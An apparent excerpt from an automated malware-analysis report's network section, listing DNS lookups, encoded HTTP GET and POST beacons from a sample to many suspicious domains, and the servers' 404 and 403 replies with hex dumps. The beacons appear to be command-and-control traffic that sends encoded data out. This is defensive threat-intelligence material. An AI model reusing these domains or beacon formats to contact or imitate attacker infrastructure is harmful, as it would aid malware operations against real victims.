            Source: global trafficHTTP traffic detected: GET /ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.faxinguxn6.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.hereboy.co.ukUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rebornqababy.ruUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /r7gq/?GBbljTO=J5YXCuAbT0imQyqe16hzUfFFlDgtP40GBYCO3M0UAxiKR6OMc8IU/OmfKBQVi2nAD0slqU03Fjqs2wbSr2/73QjcpJUwGjWcGd039QJH+viAIsBs41Zzvp+05pTyuEBiwTKkz9s=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bulletinnest.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.erosonline.com.brUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0+FqeEti6E2PrLBpyTIXPFyvdDByTjqw0HMrkRgwgyVhVHjteWGV6y9HyWgZi3RwvVIvWEZBOaOAOWOeC1I2qg94IuubjyoeGZ/2oiDpUvJToX5v0=&mB=rL4lP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.cavetta.org.mtUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.jl884.vip
            Source: global trafficDNS traffic detected: DNS query: www.cloudsoda.xyz
            Source: global trafficDNS traffic detected: DNS query: www.d99qtpkvavjj.xyz
            Source: global trafficDNS traffic detected: DNS query: www.firmshow.top
            Source: global trafficDNS traffic detected: DNS query: www.jl800.vip
            Source: global trafficDNS traffic detected: DNS query: www.theridleysuk.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.dexiangovernment.org
            Source: global trafficDNS traffic detected: DNS query: www.autonomyai.xyz
            Source: global trafficDNS traffic detected: DNS query: www.faxinguxn6.cn
            Source: global trafficDNS traffic detected: DNS query: www.hereboy.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.rebornqababy.ru
            Source: global trafficDNS traffic detected: DNS query: www.bulletinnest.com
            Source: global trafficDNS traffic detected: DNS query: www.erosonline.com.br
            Source: global trafficDNS traffic detected: DNS query: www.cavetta.org.mt
            Source: unknownHTTP traffic detected: POST /r4rr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 212Host: www.d99qtpkvavjj.xyzOrigin: http://www.d99qtpkvavjj.xyzReferer: http://www.d99qtpkvavjj.xyz/r4rr/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 47 42 62 6c 6a 54 4f 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 6a 69 4b 51 66 70 77 2f 35 30 62 70 69 43 69 6a 59 37 5a 43 33 39 44 59 46 76 55 44 77 4c 4a 50 37 4a 64 4b 77 4a 71 70 4f 70 50 77 59 64 71 67 32 62 52 57 53 36 54 5a 5a 48 4e 6d 48 48 74 70 4a 67 4e 44 79 77 5a 36 34 4b 57 53 54 66 66 6e 4e 35 53 49 32 61 6d 67 57 59 67 66 46 69 4f 48 34 66 6b 67 44 52 50 76 73 74 68 38 55 69 4b 71 6b 69 6d 56 33 36 32 46 4b 52 42 4f 65 48 58 79 46 59 53 63 62 45 6d 54 78 65 78 67 5a 75 6e 49 76 2f 43 4d 7a 6a 2f 73 42 68 58 72 36 6b 6b 72 36 34 42 30 48 47 67 4c 6f 47 76 52 4c 2b 72 54 7a 37 68 5a 57 39 68 7a 64 78 6f 7a 51 4b 65 46 Data Ascii: GBbljTO=C3FIcjbM8hgqjiKQfpw/50bpiCijY7ZC39DYFvUDwLJP7JdKwJqpOpPwYdqg2bRWS6TZZHNmHHtpJgNDywZ64KWSTffnN5SI2amgWYgfFiOH4fkgDRPvsth8UiKqkimV362FKRBOeHXyFYScbEmTxexgZunIv/CMzj/sBhXr6kkr64B0HGgLoGvRL+rTz7hZW9hzdxozQKeF
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:03:32 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:03:35 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:03:37 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:03:40 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Tue, 02 Jul 2024 12:04:34 GMTContent-Length: 0Connection: closeWAFRule: 5
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 02 Jul 2024 12:04:37 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 02 Jul 2024 12:04:41 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 02 Jul 2024 12:04:43 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 02 Jul 2024 12:04:46 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 02 Jul 2024 12:05:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f a9 19 49 61 4d ba 49 6a dd 7f 6f da 45 f0 32 f0 66 be 79 bc c7 af ca 97 ad 7c 6f 2a 78 92 cf 35 34 ed 63 bd df c2 ea 16 71 5f c9 1d 62 29 cb cb 65 cd 72 c4 ea b0 12 19 37 f1 eb 28 b8 21 a5 93 88 7d 3c 92 28 f2 02 0e 2e c2 ce 8d 56 73 bc 2c 33 8e 0b c4 3b a7 cf f3 df 9d f8 c7 24 95 f1 41 48 43 e0 e9 34 52 88 a4 a1 7d ad 61 52 01 6c e2 3e 67 0e 9c 85 68 fa 00 81 fc 37 79 c6 71 98 9d 7c 1a 4a 6b 4f 21 88 87 41 7d 18 c2 35 2b d8 66 03 d7 ad ed 7f 6e e0 6d c1 41 45 98 a6 89 79 ea 9c b7 27 d5 a9 ee cc fc 08 8d f3 11 ee 73 8e 7f 1e 29 ea 12 32 c5 9a cb 65 bf 17 93 61 4a 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaMAK0`.]B]IaMIjoE2fy|o*x54cq_b)er7(!}<(.Vs,3;$AHC4R}aRl>gh7yq|JkO!A}5+fnmAEy's)2eaJ0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 02 Jul 2024 12:05:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f a9 19 49 61 4d ba 49 6a dd 7f 6f da 45 f0 32 f0 66 be 79 bc c7 af ca 97 ad 7c 6f 2a 78 92 cf 35 34 ed 63 bd df c2 ea 16 71 5f c9 1d 62 29 cb cb 65 cd 72 c4 ea b0 12 19 37 f1 eb 28 b8 21 a5 93 88 7d 3c 92 28 f2 02 0e 2e c2 ce 8d 56 73 bc 2c 33 8e 0b c4 3b a7 cf f3 df 9d f8 c7 24 95 f1 41 48 43 e0 e9 34 52 88 a4 a1 7d ad 61 52 01 6c e2 3e 67 0e 9c 85 68 fa 00 81 fc 37 79 c6 71 98 9d 7c 1a 4a 6b 4f 21 88 87 41 7d 18 c2 35 2b d8 66 03 d7 ad ed 7f 6e e0 6d c1 41 45 98 a6 89 79 ea 9c b7 27 d5 a9 ee cc fc 08 8d f3 11 ee 73 8e 7f 1e 29 ea 12 32 c5 9a cb 65 bf 17 93 61 4a 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaMAK0`.]B]IaMIjoE2fy|o*x54cq_b)er7(!}<(.Vs,3;$AHC4R}aRl>gh7yq|JkO!A}5+fnmAEy's)2eaJ0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 02 Jul 2024 12:05:12 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f a9 19 49 61 4d ba 49 6a dd 7f 6f da 45 f0 32 f0 66 be 79 bc c7 af ca 97 ad 7c 6f 2a 78 92 cf 35 34 ed 63 bd df c2 ea 16 71 5f c9 1d 62 29 cb cb 65 cd 72 c4 ea b0 12 19 37 f1 eb 28 b8 21 a5 93 88 7d 3c 92 28 f2 02 0e 2e c2 ce 8d 56 73 bc 2c 33 8e 0b c4 3b a7 cf f3 df 9d f8 c7 24 95 f1 41 48 43 e0 e9 34 52 88 a4 a1 7d ad 61 52 01 6c e2 3e 67 0e 9c 85 68 fa 00 81 fc 37 79 c6 71 98 9d 7c 1a 4a 6b 4f 21 88 87 41 7d 18 c2 35 2b d8 66 03 d7 ad ed 7f 6e e0 6d c1 41 45 98 a6 89 79 ea 9c b7 27 d5 a9 ee cc fc 08 8d f3 11 ee 73 8e 7f 1e 29 ea 12 32 c5 9a cb 65 bf 17 93 61 4a 17 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaMAK0`.]B]IaMIjoE2fy|o*x54cq_b)er7(!}<(.Vs,3;$AHC4R}aRl>gh7yq|JkO!A}5+fnmAEy's)2eaJ0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Tue, 02 Jul 2024 12:05:15 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 279Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 65 62 6f 72 6e 71 61 62 61 62 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rebornqababy.ru Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jul 2024 12:05:21 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 36 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 